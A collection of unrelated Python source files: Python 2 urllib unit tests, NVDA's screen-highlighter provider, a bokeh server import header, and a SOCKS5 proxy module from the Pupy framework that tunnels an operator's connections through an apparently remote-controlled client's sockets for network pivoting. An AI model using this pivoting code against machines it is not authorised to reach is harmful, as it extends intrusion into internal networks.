"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
self.assertRaises(TypeError, urllib.quote, None)
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = '\xab\xea'
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquote_with_unicode(self):
r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the nturl2path library')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.url2pathname(url)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of the password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.splitpasswd('user:a\nb'))
self.assertEqual(('user', 'a\tb'),urllib.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.splitpasswd('user:a:b'))
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic enviroments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
DeprecationWarning)
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
socks5proxy.py
|
# -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
#RFC @https://www.ietf.org/rfc/rfc1928.txt
from pupylib.PupyModule import *
import StringIO
import SocketServer
import threading
import socket
import logging
import struct
import traceback
import time
__class_name__="Socks5Proxy"
CODE_SUCCEEDED='\x00'
CODE_GENERAL_SRV_FAILURE='\x01'
CODE_CONN_NOT_ALLOWED='\x02'
CODE_NET_NOT_REACHABLE='\x03'
CODE_HOST_UNREACHABLE='\x04'
CODE_CONN_REFUSED='\x05'
CODE_TTL_EXPIRED='\x06'
CODE_COMMAND_NOT_SUPPORTED='\x07'
CODE_ADDRESS_TYPE_NOT_SUPPORTED='\x08'
CODE_UNASSIGNED='\x09'
class SocketPiper(threading.Thread):
def __init__(self, read_sock, write_sock):
threading.Thread.__init__(self)
self.daemon=True
self.read_sock=read_sock
self.write_sock=write_sock
def run(self):
try:
self.read_sock.setblocking(0)
while True:
data=""
try:
data+=self.read_sock.recv(1000000)
if not data:
break
except Exception as e:
if e[0]==9:#errno connection closed
break
if not data:
time.sleep(0.05)
continue
self.write_sock.sendall(data)
except Exception as e:
logging.debug("error in socket piper: %s"%str(traceback.format_exc()))
finally:
try:
self.write_sock.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.write_sock.close()
except:
pass
try:
self.read_sock.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.read_sock.close()
except:
pass
logging.debug("piper finished")
class Socks5RequestHandler(SocketServer.BaseRequestHandler):
def _socks_response(self, code, terminate=False):
ip="".join([chr(int(i)) for i in self.server.server_address[0].split(".")])
port=struct.pack("!H",self.server.server_address[1])
self.request.sendall("\x05"+code+"\x00"+"\x01"+ip+port)
if terminate:
try:
self.request.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.request.close()
except:
pass
def handle(self):
self.request.settimeout(5)
VER=self.request.recv(1)
NMETHODS=self.request.recv(1)
METHODS=self.request.recv(int(struct.unpack("!B",NMETHODS)[0]))
"""
o X'00' NO AUTHENTICATION REQUIRED
o X'01' GSSAPI
o X'02' USERNAME/PASSWORD
o X'03' to X'7F' IANA ASSIGNED
o X'80' to X'FE' RESERVED FOR PRIVATE METHODS
o X'FF' NO ACCEPTABLE METHODS
"""
#for now only no authentication is supported :
self.request.sendall("\x05\x00")
VER=self.request.recv(1)
if VER!="\x05":
self.server.module.error("receiving unsuported socks version: %s"%VER.encode('hex'))
self._socks_response(CODE_GENERAL_SRV_FAILURE, terminate=True)
return
CMD=self.request.recv(1)
if CMD!="\x01": # we only support CONNECT for now
self.server.module.error("receiving unsuported socks CMD: %s"%CMD.encode('hex'))
self._socks_response(CODE_COMMAND_NOT_SUPPORTED, terminate=True)
return
RSV=self.request.recv(1)
DST_ADDR=None
DST_PORT=None
ATYP=self.request.recv(1)
if ATYP=="\x01":
DST_ADDR=".".join([str(ord(x)) for x in self.request.recv(4)])
DST_PORT=struct.unpack("!H",self.request.recv(2))[0]
elif ATYP=="\x03":
DOMAIN_LEN=int(struct.unpack("!B",self.request.recv(1))[0])
DST_ADDR=self.request.recv(DOMAIN_LEN)
DST_PORT=struct.unpack("!H",self.request.recv(2))[0]
else: #TODO: ipv6
self.server.module.error("atyp not supported: %s"%ATYP.encode('hex'))
self._socks_response(CODE_ADDRESS_TYPE_NOT_SUPPORTED, terminate=True)
return
#now we have all we need, we can open the socket proxyfied through rpyc :)
self.server.module.info("connecting to %s:%s ..."%(DST_ADDR,DST_PORT))
rsocket_mod=self.server.rpyc_client.conn.modules.socket
rsocket=rsocket_mod.socket(rsocket_mod.AF_INET,rsocket_mod.SOCK_STREAM)
rsocket.settimeout(5)
try:
rsocket.connect((DST_ADDR, DST_PORT))
except Exception as e:
self.server.module.error("error %s connecting to %s:%s ..."%(str(e),DST_ADDR,DST_PORT))
if e[0]==10060:
self._socks_response(CODE_HOST_UNREACHABLE, terminate=True)
else:
self._socks_response(CODE_NET_NOT_REACHABLE, terminate=True)
return
self._socks_response(CODE_SUCCEEDED)
self.server.module.success("connection to %s:%s succeed !"%(DST_ADDR,DST_PORT))
#self.request.settimeout(30)
#rsocket.settimeout(30)
sp1=SocketPiper(self.request, rsocket)
sp2=SocketPiper(rsocket, self.request)
sp1.start()
sp2.start()
sp1.join()
sp2.join()
self.server.module.info("conn to %s:%s closed"%(DST_ADDR,DST_PORT))
class Socks5Server(SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True, rpyc_client=None, module=None):
self.rpyc_client=rpyc_client
self.module=module
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
class ThreadedSocks5Server(SocketServer.ThreadingMixIn, Socks5Server):
pass
@config(cat="network", tags=["pivot", "proxy"])
class Socks5Proxy(PupyModule):
""" start a socks5 proxy going through a client """
max_clients=1
unique_instance=True
daemon=True
server=None
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='socks5proxy', description=self.__doc__)
self.arg_parser.add_argument('-p', '--port', default='1080')
self.arg_parser.add_argument('action', choices=['start','stop'])
def stop_daemon(self):
self.success("shuting down socks server ...")
if self.server:
self.server.shutdown()
del self.server
self.success("socks server shut down")
else:
self.error("server is None")
def run(self, args):
if args.action=="start":
if self.server is None:
self.success("starting server ...")
self.server = ThreadedSocks5Server(("127.0.0.1", int(args.port)), Socks5RequestHandler, rpyc_client=self.client, module=self)
t=threading.Thread(target=self.server.serve_forever)
t.daemon=True
t.start()
self.success("socks5 server started on 127.0.0.1:%s"%args.port)
else:
self.error("socks5 server is already started !")
elif args.action=="stop":
if self.server:
self.job.stop()
del self.job
self.success("socks5 server stopped !")
else:
self.error("socks5 server is already stopped")
|
NVDAHighlighter.py
|
# visionEnhancementProviders/NVDAHighlighter.py
# A part of NonVisual Desktop Access (NVDA)
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
# Copyright (C) 2018-2019 NV Access Limited, Babbage B.V., Takuya Nishimoto
"""Default highlighter based on GDI Plus."""
import vision
from vision.constants import Role, Context
from vision.util import getContextRect
from windowUtils import CustomWindow
import wx
import gui
import api
from ctypes import byref, WinError
from ctypes.wintypes import COLORREF, MSG
import winUser
from logHandler import log
from mouseHandler import getTotalWidthAndHeightAndMinimumPosition
from locationHelper import RectLTWH
from collections import namedtuple
import threading
import winGDI
import weakref
from colors import RGB
import core
import driverHandler
class HighlightStyle(
namedtuple("HighlightStyle", ("color", "width", "style", "margin"))
):
"""Represents the style of a highlight for a particular context.
@ivar color: The color to use for the style
@type color: L{RGB}
@ivar width: The width of the lines to be drawn, in pixels.
A higher width reduces the inner dimensions of the rectangle.
Therefore, if you need to increase the outer dimensions of the rectangle,
you need to increase the margin as well.
@type width: int
@ivar style: The style of the lines to be drawn;
One of the C{winGDI.DashStyle*} enumeration constants.
@type style: int
@ivar margin: The number of pixels between the highlight's rectangle
and the rectangle of the object to be highlighted.
A higher margin stretches the highlight's rectangle.
This value may also be negative.
@type margin: int
"""
BLUE = RGB(0x03, 0x36, 0xFF)
PINK = RGB(0xFF, 0x02, 0x66)
YELLOW = RGB(0xFF, 0xDE, 0x03)
DASH_BLUE = HighlightStyle(BLUE, 5, winGDI.DashStyleDash, 5)
SOLID_PINK = HighlightStyle(PINK, 5, winGDI.DashStyleSolid, 5)
SOLID_BLUE = HighlightStyle(BLUE, 5, winGDI.DashStyleSolid, 5)
SOLID_YELLOW = HighlightStyle(YELLOW, 2, winGDI.DashStyleSolid, 2)
class HighlightWindow(CustomWindow):
transparency = 0xff
className = u"NVDAHighlighter"
windowName = u"NVDA Highlighter Window"
windowStyle = winUser.WS_POPUP | winUser.WS_DISABLED
extendedWindowStyle = winUser.WS_EX_TOPMOST | winUser.WS_EX_LAYERED
transparentColor = 0 # Black
@classmethod
def _get__wClass(cls):
wClass = super()._wClass
wClass.style = winUser.CS_HREDRAW | winUser.CS_VREDRAW
wClass.hbrBackground = winGDI.gdi32.CreateSolidBrush(COLORREF(cls.transparentColor))
return wClass
def updateLocationForDisplays(self):
if vision._isDebug():
log.debug("Updating NVDAHighlighter window location for displays")
displays = [wx.Display(i).GetGeometry() for i in range(wx.Display.GetCount())]
screenWidth, screenHeight, minPos = getTotalWidthAndHeightAndMinimumPosition(displays)
# Hack: Windows has a "feature" that will stop desktop shortcut hotkeys from working
# when a window is full screen.
# Removing one line of pixels from the bottom of the screen will fix this.
left = minPos.x
top = minPos.y
width = screenWidth
height = screenHeight - 1
self.location = RectLTWH(left, top, width, height)
winUser.user32.ShowWindow(self.handle, winUser.SW_HIDE)
if not winUser.user32.SetWindowPos(
self.handle,
winUser.HWND_TOPMOST,
left, top, width, height,
winUser.SWP_NOACTIVATE
):
raise WinError()
winUser.user32.ShowWindow(self.handle, winUser.SW_SHOWNA)
def __init__(self, highlighter):
if vision._isDebug():
log.debug("initializing NVDAHighlighter window")
super(HighlightWindow, self).__init__(
windowName=self.windowName,
windowStyle=self.windowStyle,
extendedWindowStyle=self.extendedWindowStyle,
parent=gui.mainFrame.Handle
)
self.location = None
self.highlighterRef = weakref.ref(highlighter)
winUser.SetLayeredWindowAttributes(
self.handle,
self.transparentColor,
self.transparency,
winUser.LWA_ALPHA | winUser.LWA_COLORKEY)
self.updateLocationForDisplays()
if not winUser.user32.UpdateWindow(self.handle):
raise WinError()
def windowProc(self, hwnd, msg, wParam, lParam):
if msg == winUser.WM_PAINT:
self._paint()
# Ensure the window is top most
winUser.user32.SetWindowPos(
self.handle,
winUser.HWND_TOPMOST,
0, 0, 0, 0,
winUser.SWP_NOACTIVATE | winUser.SWP_NOMOVE | winUser.SWP_NOSIZE
)
elif msg == winUser.WM_DESTROY:
winUser.user32.PostQuitMessage(0)
elif msg == winUser.WM_TIMER:
self.refresh()
elif msg == winUser.WM_DISPLAYCHANGE:
# wx might not be aware of the display change at this point
core.callLater(100, self.updateLocationForDisplays)
def _paint(self):
highlighter = self.highlighterRef()
if not highlighter:
# The highlighter instance died unexpectedly, kill the window as well
winUser.user32.PostQuitMessage(0)
return
contextRects = {}
for context in highlighter.enabledContexts:
rect = highlighter.contextToRectMap.get(context)
if not rect:
continue
elif context == Context.NAVIGATOR and contextRects.get(Context.FOCUS) == rect:
# When the focus overlaps the navigator object, which is usually the case,
# show a different highlight style.
# Focus is in contextRects, do not show the standalone focus highlight.
contextRects.pop(Context.FOCUS)
# Navigator object might be in contextRects as well
contextRects.pop(Context.NAVIGATOR, None)
context = Context.FOCUS_NAVIGATOR
contextRects[context] = rect
if not contextRects:
return
with winUser.paint(self.handle) as hdc:
with winGDI.GDIPlusGraphicsContext(hdc) as graphicsContext:
for context, rect in contextRects.items():
HighlightStyle = highlighter._ContextStyles[context]
# Before calculating logical coordinates,
# make sure the rectangle falls within the highlighter window
rect = rect.intersection(self.location)
try:
rect = rect.toLogical(self.handle)
except RuntimeError:
log.debugWarning("", exc_info=True)
rect = rect.toClient(self.handle)
try:
rect = rect.expandOrShrink(HighlightStyle.margin)
except RuntimeError:
pass
with winGDI.GDIPlusPen(
HighlightStyle.color.toGDIPlusARGB(),
HighlightStyle.width,
HighlightStyle.style
) as pen:
winGDI.gdiPlusDrawRectangle(graphicsContext, pen, *rect.toLTWH())
def refresh(self):
winUser.user32.InvalidateRect(self.handle, None, True)
class VisionEnhancementProvider(vision.providerBase.VisionEnhancementProvider):
name = "NVDAHighlighter"
# Translators: Description for NVDA's built-in screen highlighter.
description = _("NVDA Highlighter")
supportedRoles = frozenset([Role.HIGHLIGHTER])
supportedContexts = (Context.FOCUS, Context.NAVIGATOR, Context.BROWSEMODE)
_ContextStyles = {
Context.FOCUS: DASH_BLUE,
Context.NAVIGATOR: SOLID_PINK,
Context.FOCUS_NAVIGATOR: SOLID_BLUE,
Context.BROWSEMODE: SOLID_YELLOW,
}
refreshInterval = 100
customWindowClass = HighlightWindow
# Default settings for parameters
highlightFocus = True
highlightNavigator = True
highlightBrowseMode = True
_contextOptionLabelsWithAccelerators = {
# Translators: shown for a highlighter setting that toggles
# highlighting the system focus.
Context.FOCUS: _("Highlight system fo&cus"),
# Translators: shown for a highlighter setting that toggles
# highlighting the browse mode cursor.
Context.BROWSEMODE: _("Highlight browse &mode cursor"),
# Translators: shown for a highlighter setting that toggles
# highlighting the navigator object.
Context.NAVIGATOR: _("Highlight navigator &object"),
}
@classmethod
def _get_supportedSettings(cls):
return [
driverHandler.BooleanDriverSetting(
'highlight%s' % (context[0].upper() + context[1:]),
cls._contextOptionLabelsWithAccelerators[context],
defaultVal=True
)
for context in cls.supportedContexts
]
@classmethod
def canStart(cls) -> bool:
return True
def registerEventExtensionPoints(self, extensionPoints):
extensionPoints.post_focusChange.register(self.handleFocusChange)
extensionPoints.post_reviewMove.register(self.handleReviewMove)
extensionPoints.post_browseModeMove.register(self.handleBrowseModeMove)
def __init__(self):
super(VisionEnhancementProvider, self).__init__()
self.contextToRectMap = {}
winGDI.gdiPlusInitialize()
self.window = None
self._highlighterThread = threading.Thread(target=self._run)
self._highlighterThread.daemon = True
self._highlighterThread.start()
def terminate(self):
if self._highlighterThread:
if not winUser.user32.PostThreadMessageW(self._highlighterThread.ident, winUser.WM_QUIT, 0, 0):
raise WinError()
self._highlighterThread.join()
self._highlighterThread = None
winGDI.gdiPlusTerminate()
self.contextToRectMap.clear()
super(VisionEnhancementProvider, self).terminate()
def _run(self):
if vision._isDebug():
log.debug("Starting NVDAHighlighter thread")
window = self.window = self.customWindowClass(self)
self.timer = winUser.WinTimer(window.handle, 0, self.refreshInterval, None)
msg = MSG()
while winUser.getMessage(byref(msg), None, 0, 0):
winUser.user32.TranslateMessage(byref(msg))
winUser.user32.DispatchMessageW(byref(msg))
if vision._isDebug():
log.debug("Quit message received on NVDAHighlighter thread")
if self.timer:
self.timer.terminate()
self.timer = None
if self.window:
self.window.destroy()
self.window = None
def updateContextRect(self, context, rect=None, obj=None):
"""Updates the position rectangle of the highlight for the specified context.
If rect is specified, the method directly writes the rectangle to the contextToRectMap.
Otherwise, it will call L{getContextRect}
"""
if context not in self.enabledContexts:
return
if rect is None:
try:
rect = getContextRect(context, obj=obj)
except (LookupError, NotImplementedError, RuntimeError, TypeError):
rect = None
self.contextToRectMap[context] = rect
def handleFocusChange(self, obj):
self.updateContextRect(context=Context.FOCUS, obj=obj)
if not api.isObjectInActiveTreeInterceptor(obj):
self.contextToRectMap.pop(Context.BROWSEMODE, None)
else:
self.handleBrowseModeMove()
def handleReviewMove(self, context):
self.updateContextRect(context=Context.NAVIGATOR)
def handleBrowseModeMove(self, obj=None):
self.updateContextRect(context=Context.BROWSEMODE)
def refresh(self):
"""Refreshes the screen positions of the enabled highlights.
"""
if self.window:
self.window.refresh()
def _get_enabledContexts(self):
"""Gets the contexts for which the highlighter is enabled.
"""
return tuple(
context for context in self.supportedContexts
if getattr(self, 'highlight%s' % (context[0].upper() + context[1:]))
)
|
server.py
|
"""
Utilities for creating bokeh Server instances.
"""
import datetime as dt
import html
import inspect
import logging
import os
import pathlib
import signal
import sys
import traceback
import threading
import uuid
from collections import OrderedDict
from contextlib import contextmanager
from functools import partial, wraps
from types import FunctionType, MethodType
from urllib.parse import urljoin, urlparse
import param
import bokeh
import bokeh.command.util
# Bokeh imports
from bokeh.application import Application as BkApplication
from bokeh.application.handlers.code import CodeHandler, _monkeypatch_io, patch_curdoc
from bokeh.application.handlers.function import FunctionHandler
from bokeh.command.util import build_single_handler_application
from bokeh.core.templates import AUTOLOAD_JS
from bokeh.document.events import ModelChangedEvent
from bokeh.embed.bundle import Script
from bokeh.embed.elements import html_page_for_render_items, script_for_render_items
from bokeh.embed.util import RenderItem
from bokeh.io import curdoc
from bokeh.server.server import Server
from bokeh.server.urls import per_app_patterns, toplevel_patterns
from bokeh.server.views.autoload_js_handler import AutoloadJsHandler as BkAutoloadJsHandler
from bokeh.server.views.doc_handler import DocHandler as BkDocHandler
from bokeh.server.views.root_handler import RootHandler as BkRootHandler
from bokeh.server.views.static_handler import StaticHandler
# Tornado imports
from tornado.ioloop import IOLoop
from tornado.websocket import WebSocketHandler
from tornado.web import RequestHandler, StaticFileHandler, authenticated
from tornado.wsgi import WSGIContainer
# Internal imports
from ..util import edit_readonly
